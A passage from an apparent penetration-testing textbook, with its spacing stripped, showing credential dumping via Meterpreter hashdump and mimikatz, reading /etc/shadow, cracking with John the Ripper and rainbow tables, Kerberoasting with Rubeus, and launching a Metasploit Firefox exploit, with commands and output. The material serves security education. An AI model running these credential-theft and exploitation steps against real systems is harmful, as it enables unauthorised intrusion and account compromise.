getsystem.NotallexploitsinMetasploitcanyieldaMeterpretershell,butifwecangetone,wehaveapowerfulallyingatheringinformationandperformingpost-­exploitationwork.UsingMeterpreter,wecangatherinformationaboutthesystemsoweknowwhatwe’regettingforpassworddata.Thecommandsysinfowilltellusthesystemnameaswellastheoperatingsystem.Thistellsuswe’regoingtobelookingatLANManagerhasheswhenwegrabthepasswords.Wecandothatusingthehashdumpcommand,whichyoucanseeinthefollowinglisting.GatheringPasswords 277ObtainingPasswordswith MeterpreterComputer:WUBBLE-­C765F2OS:WindowsXP(Build2600,ServicePack2).Architecture:x86SystemLanguage:en_USDomain:WORKGROUPLoggedOnUsers:2Meterpreter:x86/windowsmeterpreter>hashdumpAdministrator:500:ed174b89559f980793e287acb8bf6ba6:5f7277b8635625ad2d2d551867124dbd:::ASPNET:1003:5b8cce8d8be0d65545aefda15894afa0:227510be54d4e5285f3537a22e855dfc:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c079c0:::HelpAssistant:1000:7e86e0590641f80063c81f86ee9efa9c:ef449e873959d4b1536660525657047d:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2e54afff1eaa6b62fc0649b715104187:::Thehashdumpprovidestheusername,theuseridentifier,andthehashvalueofthepassword.We’llneedthatwhenitcomestocrackingthepassword.Thesecredentialswillbehelpfulaswecontinuemovingthroughthenetwork.Thecredentialsmaybeusefulforadditionalvulnerabilities,oratleastwithdifferenttestingprogramsandMetasploitmodules.Thisisnottheonlywaywecangrabpasswordhashes,though.Thereisamodulenamedmimikatzthatcanbeused.WestillneedMeterpreter,sowecanloadupthemimikatzmoduletouseit.Inthefollowinglisting,youcanseeloadingmimikatzandthenpullingthepasswordhashes.Youcanseetheresultsofrunningmsv,whichmakesuseoftheMSVauthenticationpackagetopullthehashesforusers.Wecanalsousemimikatztoseeifthesecuritysupportprovider(SSP)hascredentials.Finally,weusemimikatztopullhashesfromtheliveSSP.OnlytheMSVauthenticationpackageyieldedresultsforusonthissystem.ObtainingPasswordswith mimikatzmeterpreter>loadmimikatzLoadingextensionmimikatz...Success.meterpreter>msv[+]RunningasSYSTEM[*]Retrievingmsvcredentialsmsvcredentials===============278 Chapter7  SystemHacking■AuthIDPackageDomain-­-­-­-­-­-­-­-­-­-­-­­-­-­-­-­­-­-­0;293526NTLMVAGRANT-­2008R25229b7f52540641daad3b435b51404ee},0;96746NTLMVAGRANT-­2008R2e501ddc244ad2c14829b15382fe04c64},0;996NegotiateWORKGROUP0;997NegotiateNTAUTHORITY0;20243NTLM0;999NTLMWORKGROUPUserPassword-­-­­-­-­-­-­-­-­-­-­­vagrantlm{ntlm{e02bc503339d51f71d913c245d35b50b}sshd_serverlm{ntlm{8d0a16cfc061c3359db455d00ec27035}VAGRANT-­2008R2$n.s.(CredentialsKO)LOCALSERVICEn.s.(CredentialsKO)n.s.(CredentialsKO)VAGRANT-­2008R2$n.s.(CredentialsKO)meterpreter>ssp[+]RunningasSYSTEM[*]Retrievingsspcredentialssspcredentials===============AuthIDPackageDomainUserPassword-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­meterpreter>livessp[+]RunningasSYSTEM[*]Retrievinglivesspcredentialslivesspcredentials===================AuthID-­-­-­-­-­-­0;9960;9970;2935260;967460;202430;999Package-­-­-­-­­-­-­NegotiateNegotiateNTLMNTLMNTLMNTLMDomain-­-­­-­-­­WORKGROUPNTAUTHORITYVAGRANT-­2008R2VAGRANT-­2008R2WORKGROUPUser-­-­­-­VAGRANT-­2008R2$LOCALSERVICEvagrantsshd_serverPassword-­-­-­-­-­-­-­-­n.a.(livesspn.a.(livesspn.a.(livesspn.a.(livesspn.a.(livesspVAGRANT-­2008R2$n.a.(livesspKO)KO)KO)KO)KO)KO)WhenwecompromiseaLinuxsystem,wecan’tusehashdump,butwestillwanttograbthepasswords.Eitherwecangetashelldirectlyfromanexploit,orifweuseaMeterpreterpayload,wecandroptoashell.Thisiswherewe’dbeabletoaccessthepasswords.Inthefollowingcode,youcanseedroppingtoashellfromMeterpreter.Fromthere,wecanjustusecattoprintthecontentsofthe/etc/shadowfile.Wedoneedtohaverootaccesstoseethecontentsoftheshadowfile.Youcanseebyrunningwhoamithatwe’vegainedaccessasroot.Ifyouwanttocollectpasswordsfromanexploitthatdoesn’tgiveyourootaccess,you’llneedtofindaprivilegeescalation.PasswordCracking 279ShellAccessto/etc/shadowmeterpreter>shellProcess1created.Channel1created.whoamirootcat/etc/shadowroot:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::daemon:*:14684:0:99999:7:::bin:*:14684:0:99999:7:::sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::sync:*:14684:0:99999:7:::games:*:14684:0:99999:7:::man:*:14684:0:99999:7:::lp:*:14684:0:99999:7:::mail:*:14684:0:99999:7:::news:*:14684:0:99999:7:::uucp:*:14684:0:99999:7:::proxy:*:14684:0:99999:7:::www-­data:*:14684:0:99999:7:::backup:*:14684:0:99999:7:::list:*:14684:0:99999:7:::You’llnoticethatthereisnoprompt,whichcanmakeitdifficulttodistinguishthecommandsfromtheoutput.Intheoutput,thefirstcommandiswhoamitodemonstratethattheuserloggedinisroot.Afterthat,youcanseethecommandcat/etc/shadowandthentheoutputofthatcommand.Mostoftheusersthatareshowndon’thavepasswords.Onlyrootandsysappeartohavepasswordsinthisoutput.WhilethemeansofgettingtothepasswordsshownhereisdifferentfromWindows,thesearealsohashes.ThepasswordhashesaregeneratedusingadifferenthashalgorithmunderLinuxthanunderWindows.Ineithercase,though,youcanusethehashestorunthroughapasswordcrackingprogram.PasswordCrackingPasswordhashesdon’tdousmuchgood.Youaren’teveraskedtopassinapasswordhashwhenyouareauthenticating.Thehashisgeneratedeachtimeapasswordisenteredbyauser.Theresultinghashisthencomparedagainstthestoredhash.Passingthehashinwouldresultinitbeinghashed,sotheresultinghashfromthatcomputationwouldn’tmatchwhat280 Chapter7  SystemHacking■wasstored.Theonlywaytomatchthestoredhashistousethepassword,oratleastuseavaluethatwillgeneratethesamehashresult.Whenitcomestocrackingpasswords,wearetryingtoidentifyavaluethatwillgeneratethecryptographichash.Itistechnicallypossiblefortwoseparatestringstogeneratethesamehash.Sincewecareonlyaboutthehashesbeingequal,itdoesn’tmatterifwhatgoesinisactuallythepassword.Whentwovaluesyieldthesamehash,it’scalledacollision.Agoodwaytoavoidcollisionsistohavealargerspaceforthevaluesofthehash.Ahashalgorithmthatyields256 bitsasoutputhasordersofmagnitudemorepotentialhashvaluesthanonethatonlygenerates128bits.Theissueofcollisionsissometimesreferredtoasthebirthdayparadox,whichrelatestothestatisticalprobabilityoftwopeopleinaroomhavingthesamebirthday(monthandday).Fortheretobea50percentprobabilitythattwopeoplehavethesamebirthday,youneedonly23peopleintheroom.At70people,it’sa 99.9percentprobability.Wedon’tgetto100percentprobabilityuntilweget366 people,though.Johnthe RipperAcommontoolusedtocrackpasswordsisJohntheRipper.Johnisagreatofflinepasswordcrackingtool,whichmeansthatitworksonfilesthathavebeengrabbedfromtheiroriginalsource.Ithasdifferentmodesthatcanbeusedtocrackpasswords.Thefirst,whichyouwillseeinthenextcodelisting,isreferredtoassinglecrackmode.Singlecrackmodetakesinformationfromthedifferentfieldsinthefile,applyingmanglingrulestothem,totryaspasswords.Becausethelistofinputsiscomparativelysmall,thereareextensivemanglingrulestovarythesourcetexttogeneratepotentialpasswords.ThisisconsideredthefastestmodeJohnhastocrackpasswords.ItisalsothemodethedevelopersofJohnrecommendyoustartwith.JohnSingleCrackMode[email protected]:~#johnpasswords.txtarning:detectedhashtype"LM",butthestringisalsorecognizedas"NT"WUsethe"-­-­format=NT"optiontoforceloadingtheseasthattypeinsteadWarning:detectedhashtype"LM",butthestringisalsorecognizedas"NT-­old"Usethe"-­-­format=NT-­old"optiontoforceloadingtheseasthattypeinsteadUsingdefaultinputencoding:UTF-­8Usingdefaulttargetencoding:CP850PasswordCracking 281oaded8passwordhasheswithnodifferentsalts(LM[DES128/128SSE2-­L16])Press'q'orCtrl-­Ctoabort,almostanyotherkeyforstatus(SUPPORT_388945a0)(Guest)BLANDES(Administrator:1)KSUHCP9(HelpAssistant:2)Johncanalsotakewordlistsinwordlistmode.Thisisastraightforwardmodethattakesawordlistasinput,comparingthehashofeachwordagainstthepasswordhash.Youcanapplymanglingrulestoyourwordlist,whichwillgeneratevariantsonthewords,sincepeopleoftenusevariationsonknownwordsastheirpasswords.Thelongeryourwordlist,thebetterchanceyouwillhaveofcrackingpasswords.However,thelongeryourwordlist,thelongerthepasswordcrackingwilltake.Keepinmindthatwordlistswillonlyidentifypasswordsthatareinthewordlist.Ifsomeoneisusingalongpassphraseortrulyrandomcharacters,usingawordlistwon’thelp.Thismeansyouneedtotryanothermode.Finally,Johnusesincrementalmodetotryeverypossiblecombinationofcharacters.Torunthismode,though,Johnneedstobetoldwhatcharacterstotry.ThismaybeallASCIIcharacters,alluppercasecharacters,allnumbers,andsoon.YouwillalsoneedtoletJohnknowthepasswordlength.Becauseofthenumberofpossiblevariants,thismodewillneedtobestoppedbecauseJohncan’tgetthroughallthevariantsinareasonabletime,unlessyouhavespecifiedashortpasswordlength.ThisrunofJohnwasagainstWindowspasswords,ascollectedfromhashdumpinMeterpreter.IfyouwanttoworkwithLinuxpasswords,thereisanadditionalstepyouhavetodo.IntheearlydaysofUnix,fromwhichLinuxisderived,therewasasinglefilewhereuserinformationandpasswordswerestored.Theproblemwiththatwasthattherewasinformationthatregularusersneededtoobtainfromthatfile,whichmeantpermissionshadtobesuchthatanyonecouldreadit.Sincepasswordswerestoredthere,thatwasaproblem.Anyonecouldreadthehashesandobtainthepasswordsfromthosehashesusingcrackingstrategies.Asaresult,thepublicinformationwasstoredinonefile,stillnamedpasswdforbackwardcompatibility,whilethepasswordsandthenecessaryinformationthatwentwiththem,liketheusernamesanduserIDs,werestoredinanotherfile,theshadowfile.Wecancombinethetwofilessothatalltheneededinformationistogetherandconsolidatedbyusingtheunshadowprogram.Thismergestheinformationintheshadowfileandthepasswdfile.Here,youcanseearunofunshadowwithacapturedshadowfileandpasswdfile.Usingunshadow[email protected]:~#unshadowpasswd.localshadow.localroot:$6$yCc28ASu$WmFwkvikDeKL4VtJgEnYcD.PXG.4UixCikBO5jBvE3JjV43nLsfpB1z57qwLh0SNo15m5JfyQWEMhLjRv4rRO.:0:0:root:/root:/bin/bashdaemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin282 Chapter7  SystemHacking■bin:*:2:2:bin:/bin:/usr/sbin/nologinsys:*:3:3:sys:/dev:/usr/sbin/nologinsync:*:4:65534:sync:/bin:/bin/syncgames:*:5:60:games:/usr/games:/usr/sbin/nologinman:*:6:12:man:/var/cache/man:/usr/sbin/nologinlp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:*:8:8:mail:/var/mail:/usr/sbin/nologinnews:*:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:*:13:13:proxy:/bin:/usr/sbin/nologinwww-­data:*:33:33:www-­data:/var/www:/usr/sbin/nologinbackup:*:34:34:backup:/var/backups:/usr/sbin/nologinlist:*:38:38:MailingListManager:/var/list:/usr/sbin/nologinirc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:*:41:41:GnatsBug-­ReportingSystem(admin):/var/lib/gnats:/usr/sbin/nologinAsshown,mostoftheusersdon’thavepasswords.Theonlyuserwithapasswordhereistherootuser.Onceyouhavethetwofilesmergedusingunshadow,youcanrunJohnagainstittoacquirethepassword.Johnwillidentifytheformatofthefileandthehashalgorithmusedtogenerateit.Thisinformationisstoredinthefile.The$6$atthebeginningofthepasswordindicatesthatthepasswordhasbeenhashedusingthesecurehashalgorithmwith512bitsfortheoutput(SHA-­512).WhatcomesafterthatisthehashedpasswordthatJohnwillbecomparingagainst.John,though,isn’ttheonlywaytoobtainpasswordsfromlocalfiles.RainbowTablesForeverypasswordtestedusingJohn,youhavetocomputethehashtotestagainst.Thistakestimeandcomputationalpower.Withtoday’sprocessors,thetimeandcomputingpowernecessaryaren’tsuchabigdealotherthanitaddsup.Microsecondsperwordoverthecourseofmillionsofwordsaddstime.It’seasiertoprecomputethehashesbeforerunningyourchecks.Allyouneedtodothenislookupthehashinanindexandretrievetheplaintextthatwasusedtocreatethathash.Allthetime-­consumingworkisdonewellbeforeyouneedtocrackpasswords.Thereisatrade-­off,ofcourse.Precomputinghashesmeansyouneedtostorethemsomewhere.Rainbowtablesarethestoredprecomputedhashes.Therainbowtableisn’tasstraightforwardasjustamappingbetweenahashandapassword.Therainbowtablesarestoredinchainsinordertolimitthenumberofplaintextpasswordsstored.Insomecases,theplaintextcanbeinferredifitisnotstoreddirectly.Therearemanytoolsthatcanbeusedtolookuppasswordsfromthesetables,butfirstweneedthetables.TheRainbowCrackprojecthasatooltolookupthepasswordaswellasatoolthatwillcreatetherainbowtable.Thiscreationtoolisn’tusedtogeneratehashesfromwordlists.Instead,itwillgenerateahashPasswordCracking 283fromallpossiblepasswordvalueswithintheconstraintsprovided.Inthefollowingcode,youwillseetheuseofrtgentogeneratearainbowtable.UsingrtgenforRainbowTables[email protected]:~#rtgenmd5loweralpha-­numeric5803800335544320rainbowtablemd5_loweralpha-­numeric#5-­8_0_3800x33554432_0.rtparametershashalgorithm:md5hashlength:16charsetname:loweralpha-­numericcharsetdata:abcdefghijklmnopqrstuvwxyz0123456789charsetdatainhex:6162636465666768696a6b6c6d6e6f707172737475767778797a30313233343536373839charsetlength:36plaintextlengthrange:5-­8reduceoffset:0x00000000plaintexttotal:2901711320064sequentialstartingpointbeginfrom0(0x0000000000000000)generating...131072of33554432rainbowchainsgenerated(0m28.5s)262144of33554432rainbowchainsgenerated(0m28.5s)393216of33554432rainbowchainsgenerated(0m28.5s)524288of33554432rainbowchainsgenerated(0m28.5s)655360of33554432rainbowchainsgenerated(0m28.5s)786432of33554432rainbowchainsgenerated(0m28.5s)917504of33554432rainbowchainsgenerated(0m28.5s)1048576of33554432rainbowchainsgenerated(0m28.5s)1179648of33554432rainbowchainsgenerated(0m28.5s)1310720of33554432rainbowchainsgenerated(0m28.5s)1441792of33554432rainbowchainsgenerated(0m28.5s)1572864of33554432rainbowchainsgenerated(0m28.6s)You’llnoticetheparameterspassedintortgen.Thefirstisthehashingalgorithmused.Inthiscase,it’sMessageDigest5(MD5),acommonlyusedhashingalgorithm.Thehashingalgorithmusedintherainbowtablehastomatchtheoneusedinthepasswordfile.Iftheydon’tmatch,youaren’tgoingtofindthehashorthepassword.Thenextparameteristhecharactersetthatshouldbeusedtogeneratethepasswords.We’reusinglowercaselettersaswellasnumbers.Thisgivesus36possiblecharactersineachposition.Thatyields36^nvalues,wherenisthenumberofpositions.Ifweweretryingtogeneratefour-­characterpasswords,wewouldhave36*36*36*36possiblepasswords,whichis1,679,616—­nearly2 millionfour-­characterpasswords.284 Chapter7  SystemHacking■Weneedtotellrtgenhowlongwewantourpasswordstobe.Thenexttwovaluesonthecommandlinearetheminimumpasswordlengthandthemaximumpasswordlength.Forourpurposes,wearegeneratingpasswordsthathavebetweenfiveandeightcharacters.Thatmeansatotalof36^5+36^6+36^7+36^8passwords.Thisgivesus2.8*10^12asthenumberofpasswords.Obviously,themorepasswordlengthswetakeon,themorepasswordswehavetogenerateandthelargerouroutputwillbe.Thenextvalueselectsafunction,internaltortgen,thatisusedtomapthehashestoplaintext.Thisiscalledareductionfunction.Thenexttwovalueshavetodowiththerainbowchains.Thefirstisthenumberofchainsgenerated.Themorechainsgenerated,themoredataisstoredondiskbecauseitmeansmoreplaintextisstored.Thevalueafterthatisthenumberofchainstogenerate.Arainbowtableisacollectionofchains,whereeachchainis16bytes.Finally,thelastvaluerelatestotheabilitytostorealargerainbowtableinmultiplefiles.Todothat,keepalltheotherparametersthesameandchangethisvalue.Oncewehavearainbowtable,wecancheckthepasswordfilewehaveagainstit.Youcanseearunoftheprogramrcrackinthenextcodelisting.Therewerenoresultsfromthisrunbecausetherainbowtablesthatwereusedwereverylimited.Tohaveenoughinthewayofrainbowtablestoreallycrackpasswords,wewouldneedatleastgigabytes,ifnotterabytesormore.Therearetwoparametershere.Thefirstisthelocationoftherainbowtables,whichisdot(.)here,meaningthelocaldirectory.ThesecondtellsrcrackthatthefilebeingprovidedisasetofLANManhashes.RunningrcrackwithRainbowTables[email protected]:~#rcrack.-­lmpasswords.txt1rainbowtablesfoundnohashfoundresultOnethingtonoteherewithrespecttothelocationoftherainbowtablesistheyarenotactuallystoredinthedirectoryfromwhichrcrackisrun.Instead,therainbowtablesarestoredin/usr/share/rainbowcrackontheKalisystemfromwhichthiswasrun.Whenyourunrtgen,thetableisstoredinthatdirectorybecausethat’swherethebinariesarelocated.Thecurrentdirectoryinthisinstanceisthedirectorywherercrackisratherthanthedirectorywheretheuseris.KerberoastingKerberoastingisanothertypeofpasswordcrackingattackthatreliesongettingaccesstoanetwork.ThenameisbasedonthefactthatActiveDirectoryauthenticationoveranetworkusesaprotocolcalledKerberos.Kerberos,inturn,isnamedforthethree-­headeddogofGreekmythologywhoguardedthegatesoftheUnderworldtopreventthosetherefromleaving.ItwasoriginallydevelopedattheMassachusettsInstituteofTechnology(MIT)aspartofProjectAthena,whichwasalsoresponsibleforotherprojectsliketheXWindowSystem,agraphicaluserinterfaceframeworkforUnix-­likesystems.PasswordCracking 285Kerberosworksinaclient-­servermode.Figure 7.3showsadiagramofhowKerberosworksindifferentmodes:clientauthenticationtotheAuthenticationServer(AS),clientserviceauthentication,andaclientmakingaservicerequest.MessagesfromtheclientandtheKerberosserversareencryptedusingakeyontheclientside,whichiseffectivelytheuser’spasswordincaseswhereitreliesonausertoauthenticatetorequestservicesonthenetwork.Iftheserverdecryptsusingthepassworditknowsaboutanddoesn’tgettherightdataout,itsaysthepasswordisincorrect,sotheauthenticationattemptfails.KerberosistheauthenticationprotocolthathasbeenusedinWindowsActiveDirectory(AD)implementationssinceWindows2000.FIGURE 7.3 Kerberosauthentication(CourtesyJeranRenzbyCreativeCommonsAttributionShare-­Alike)286 Chapter7  SystemHacking■TheKerberosarchitecturespecifiesseveralservices,whichmayallbeonthesamesystemormaybeseparateservers.Firstisthekeydistributioncenter(KDC).TheKDCisacommonserviceusedincryptosystemstoprotectkeymanagement.OntopoftheKDCisaticketgrantingservice(TGS),whichissuestime-­stampedmessagescalledticket-grantingtickets(TGTs)thatareencryptedusingtheTGS’ssecretkey.Thetimestampandencryptedmessagehelptoprotecttheoveralldesignastheseticketsshouldn’tbespoofedsincetheyrequiretheencryptionkeythatbelongstotheTGS.Additionally,astheyaretime-stamped,theycanhelpprotectagainstreplayattacks,whereamessagegetsputontothenetworkthatwaspreviouslycapturedinordertogetaccesstoaserviceprotectedbyKerberos.ToperformaKerberoastingattack,youneedtohavecompromisedanaccountonthedomain.ThecompromiseduseraccountwillreceiveaTGTfromtheKDCwhentheyareauthenticated.ThishasbeensignedbytheKerberosticket-grantingticketserviceaccountthatispartoftheADdesign.Theattacker,whohascontrolofthecompromiseduseraccount,wantstocompromiseaserviceonthenetwork.Theywillrequestaserviceticketforthatservice.AdomaincontrollerwiththeActiveDirectoryinfrastructurewillcreateaTGSticket,encryptingitwiththeservicepassword,retrievedfromtheADdatabase.Theonlytwoentitiesthathavethepasswordthatcoulddecryptthemessageatthispointarethedomaincontrollerandtheserviceitself.Thedomaincontrollersendsthetickettotheuser,whichisunderthecontrolofanattacker.Theticketgetssenttotheservice,whichdecryptsittodeterminewhethertheuserhasbeengrantedpermissiontotheservice.Thisticketisinmemoryandcanbeextractedfromtheresoitcanbedecrypted(orcracked)offline.ThereareanumberoftoolsthatcanbeusedtoimplementaKerberoastingattack.OneoftheseisatoolcalledRubeus.ThefollowingisanexampleofrunningRubeusagainstaWindowsdomaincontrollerat192.168.4.218.Thisrunprovidesausernameandpasswordthathasauthenticationcredentialsonthedomain.Youcouldalsoprovideapasswordhashifthat’swhatyouhadavailabletoyou.Thiswillretrieveaticketforthatuser.Theticketcouldbestoredtoafileandusedlater.Rubeuswilldothestorageforyouifyouprovidethecorrectcommand-­lineparameter.PSC:\Users\RicMessier\Documents>.\rubeus.exeasktgt/user:bogus/password:AB4dPW2021!/domain:washere.local/dc:192.168.4.218_______(_____\||_____))__||____________|__/||||_\|___||||/___)||\\||_|||_))____||_||___||_||_|____/|____/|_____)____/(___/v1.5.0[*]Action:AskTGTPasswordCracking [*][*][+][*]287Usingrc4_hmachash:DDB5401FAB757F3323C628F1A3EAFAEABuildingAS-­REQ(w/preauth)for:'washere.local\bogus'TGTrequestsuccessful!base64(ticket.kirbi):doIFAjCCBP6gAwIBBaEDAgEWooIEFzCCBBNhggQPMIIEC6ADAgEFoQ8bDVdBU0hFUkUuTE9DQUyiIjAoAMCAQKhGTAXGwZrcmJ0Z3QbDXdhc2hlcmUubG9jYWyjggPNMIIDyaADAgESoQMCAQKiggO7BIIDtxQzVpmAiZPxIraJ6/eARcbWtAUn8Ygs7La/pBRwmSt8ZK1q4RQzm7EsfMRUlV65i3Ajink15QdGfEi+F/i0FiqWz+6XnNJaO3LSuAUf1sMxdBTzSo/QSxVnHVhV5feLUD4xCCTLbFzx5jreWlE/audRlN6VodDhknl7VqS+YAZU6MFcPI6NmDpgAgqUzubN90ATpdrws4nidduyGGtTqTJR5gWggSPCnqbXERbBvrv/uzMmbRxHWuf5/TQYS4hsoB1YVG1B+e3hkf2pcZSkBC+ar7qu/cCQ0Pkr+VxhotTs5pVr4St8e9C5Exx4iLVPs38F/eZIPQg1byoEzWBXsgvQHvm6Z6sPgBP1kfPuIGyhNKaHqAabIKaJUhmM3OWBznx5EDl8mN9cQBNxxGiO+GX2boUfqLbtOveDwj4dvMi0IN2cV7yHEmQK5h+F6jMOSD5i4tMtWJyau0dQY9/x99SCuyWBcbPu1InqFHI0VtMVX980td9FTpmreSNkbVscrqB24bSkjQfkUHhR/E8radcXnDHHFBmfUmUDmHI71uz8z7r49cmLqMctCwilhfoclRW1RLi4g5X+5e+a/XfYy+PfCAMON90OkVqz7166ej4LUpRC27VkK9ieYNyICHP8PKAV5mALz5IJRKw4RP6LAlC4tUG2DO5BvMakcRefwte2+mODCEyvbgbV9043sy/a038mUZTm5Rilkki26DxXYQ4PYGpk8zia2630O3+fbHjG1lIllUnoTDGmVzMsRPH/w2yePozOR6N7Mcm+3PjgonF5w0OlK3GcVB0F1M0RpX5ABwJj8yJOsaSESu8kXUxg8jBuV0uYaqip0eo2hK+asPs0+Ka9lnPhq0ifzFNCNr+1x/vEoLwmTfKYktHOqXtF/IqmhJKNBVCiTolQlyt9wWnb+pPD83TYOsXqxah3vlUGBXY5Wc6zlUSa7ktZR4h30rXomUX4CRDvIYsgzmNsHpE66id4fD/26MXXy4kA0YWz+q/r9f3nBbmoZPABGMMSrtBP4Os6PjQPJ68ndco2AezSnpGR7LGdxtG3YHnDYpmzvPvP7ilGYyziF3eym0BRnAnJRog/UYHV02dJS5ZPCz+wmu+jpXaCKD4ILHXG7amx66pqtamFNG6LHI2uJ1HGKldIYNdoAm4D7lmjXrdw8E0jSYAGnhYdrmC95E/FndxYylyPslFohVSdLtcL1Ry9ANE3EHpUTZTCJglHocxMFZg8F0WpyMwHUiSqVaOB1jCB06ADAgEooHLBIHIfYHFMIHCoIG/MIG8MIG5oBswGaADAgEXoRIEEI59qcRDkXqpizrOjPVsVLihDxsNV0FTSEVRS5MT0NBTKISMBCgAwIBAaEJMAcbBWJvZ3VzowcDBQBA4QAApREYDzIwMjEwMTEwMjIzNjIxWqYRGA8MDIxMDExMTA4MzYyMVqnERgPMjAyMTAxMTcyMjM2MjFaqA8bDVdBU0hFUkUuTE9DQUypIjAgoAMCAQKGTAXGwZrcmJ0Z3QbDXdhc2hlcmUubG9jYWw=ServiceNameServiceRealmUserNameUserRealmStartTimeEndTimeRenewTillFlagsforwardableKeyTypeBase64(key)::::::::krbtgt/washere.localWASHERE.LOCALbogusWASHERE.LOCAL1/10/20213:36:21PM1/11/20211:36:21AM1/17/20213:36:21PMname_canonicalize,pre_authent,initial,renewable,::rc4_hmacjn2pxBOReqmMOs6M9WxUuA==288 Chapter7  SystemHacking■Technically,thisisnotaKerberoastingattack,thoughitisanattackagainstadomaincontrollertogatherticketsthatcouldbeusedlater.TorunaKerberoastingattack,youwouldusesomethinglikethefollowingcommandline:PSC:\Users\RicMessier\Documents>.\rubeus.exekerberoast/user:bogus/domain:washere.local/dc:192.168.4.218_______(_____\||_____))__||____________|__/||||_\|___||||/___)||\\||_|||_))____||_||___||_||_|____/|____/|_____)____/(___/v1.5.0[*]Action:Kerberoasting[*]NOTICE:AEShasheswillbereturnedforAES-­enabledaccounts.[*]Use/ticket:Xor/tgtdelegtoforceRC4_HMACfortheseaccounts.[*]TargetUser:bogus[*]TargetDomain:washere.local[*]Searchingpath'LDAP://192.168.4.218/DC=washere,DC=local'forKerberoastableusersThistypeofattackcanallowyoutogatheradditionalcredentialsthatwillallowyoutomovelaterally,evenifitdoesrequireafootholdinthenetworkalready.Thiscanbeachievedusingmalwaretoprovideremoteaccess.MalwareiscoveredinChapter 8,includingcreationofmalwarethatcouldbeusedtoprovideremoteaccesstoasystem.Youmightalsouseaphishingattacktogathercredentialsfromauser,whichcanthenbeusedtogetaccesstosystems.It’simportanttokeepinmindthatyouneedtohavecommand-­lineaccessonasystemtorunatoollikeRubeus.Asitisn’tonthesystemtostartwith,youwouldneedtocompileandgetitputontothetargetsystem.KerberoastingNotesAcoupleofnotesontheKerberoastingdemonstratedhere.First,alloutputwithanythingsensitivehasbeenaltered.Second,incaseitamusesyou,presumablythetoolRubeuswasnamedafterRubeusHagrid,thegamekeeperfromtheHarryPotterbooks.Hagridhadathree-­headeddognamedFluffyinthefirstbook,whichwouldbetheconnectionbetweenRubeusandKerberos.Client-­SideVulnerabilities 289Client-­SideVulnerabilitiesOfcourse,listeningservicesaren’ttheonlywaytogainaccesstosystems.Infact,theyaren’teventhebestwaynecessarily.Someofthatdependsonwhat,asanattacker,youare lookingfor.Attackersmaybelookingforcomputingandnetworkresources.Itcouldbe thatanysystemwouldbefineasaresult.Thismeansmoresystemsarebetter,andtherearegenerallymoredesktopsthanservers.Usersarealsogenerallyaneasierpathwayintothesystem.Thiscanrequireclient-­sidevulnerabilities,thatis,vulnerabilitiesthatexiston thedesktopthataren’texposedtotheoutsideworldwithoutclientinteraction.Forexample,theremaybeavulnerabilityinamailclient.Anattackercouldtriggerthatvulnerability,notbyprobingtheoutsideofthedesktopsystembutinsteadbysendingemailtoavictim.Thevictimontheclientsystemopenstheemail,thevulnerabilityistriggered,andtheattackergainsaccesstothesystem.Webbrowsersmakeconvenientattackvectors,forseveralreasons.Oneisthattheyareoneofthemostcommonlyusedapplications.NoteveryoneusesemailclientslikeOutlookorThunderbirdanymore,thoughemailclientsoncewereverycommonlyused.Manypeopleuseawebbrowsertoaccesstheiremail.Browsersareusedforsomanyothercommonfunctions,tothepointthattheycanbetheonlyapplicationsomepeopleeveruse.ThinkaboutChromeOSandtheChromebookthatrunsitasexamples.ChromeOSusesthebrowserastheuserinterface.AsChromeOSbeganlifeasathinwebclient,mostapplicationsyouwillrunonChromeOSruninsideabrowsercontext.Anotherfactorthatmakesthebrowseranicetargetisthattherejustaren’talotofbrowsersinuse.DatafromacoupleofdifferentsourcesshowsthatChromeis,byfar,thepredominantbrowserinusearoundtheworld.Thisisfollowed,distantly,bybrowserslikeInternetExplorer,Firefox,Safari,andEdge.Asaresult,ifyoucanfindavulnerabilitythataffectsChromeonWindows,you’llbeinthemoney.TheproblemwiththatisthatGoogletendstobeextremelydiligentwhenitcomestofindingandfixingvulnerabilities.Thereisn’tanyvulnerabilityinMetasploitforChrome.However,otherbrowsersdohavemodulesassociatedwiththem.OneexampleisavulnerabilityinFirefoxonmacOS.Hereyoucanseeloadingthismoduleinmsfconsole.FirefoxExploitModuleinmsfconsolemsf>useexploit/osx/browser/mozilla_mchannelmsfexploit(osx/browser/mozilla_mchannel)>showoptionsModuleoptions(exploit/osx/browser/mozilla_mchannel):NameCurrentSettingRequiredDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­SRVHOST0.0.0.0yesThelocalhosttolistenon.Thismustbeanaddressonthelocalmachineor0.0.0.0SRVPORT8080yesThelocalporttolistenon.290 Chapter7  SystemHacking■SLSfalsenoSSLCertno(defaultisrandomlygenerated)URIPATHno(defaultisrandom)NegotiateSSLforincomingconnectionsPathtoacustomSSLcertificateTheURItouseforthisexploitExploittarget:Id-­-­0Name-­-­-­-­Firefox3.6.16onMacOSX(10.6.6,10.6.7,10.6.8,10.7.2and10.7.3)msfexploit(osx/browser/mozilla_mchannel)>exploit[*]Exploitrunningasbackgroundjob0.[*]StartedreverseTCPhandleron192.168.86.62:4444msfexploit(osx/browser/mozilla_mchannel)>[*]UsingURL:http://0.0.0.0:8080/4ZhKAQwCLkOt[*]LocalIP:http://192.168.86.62:8080/4ZhKAQwCLkOt[*]Serverstarted.You’llseeacoupleofthingshere.Thisexploitstartsaserver.ThismeansyouneedtoindicatewhatIPaddresstheservershouldbelisteningon,aswellastheport.Bydefault,theserverwillbelisteningon0.0.0.0,whichmeanseveryIPaddressonthesystem.Youcanalsospecifytheport.Listeningonportswithnumberslowerthan1024requiresadministrativeprivileges.Bydefault,themodulelistensonport8080.Whentheserverstartsup,aURLisrandomlygenerated,thoughyoucanprovideoneintheoptionsifyouprefer.Oncetheserverstartsup,themoduleprovidestheURL.Startinguptheexploitalso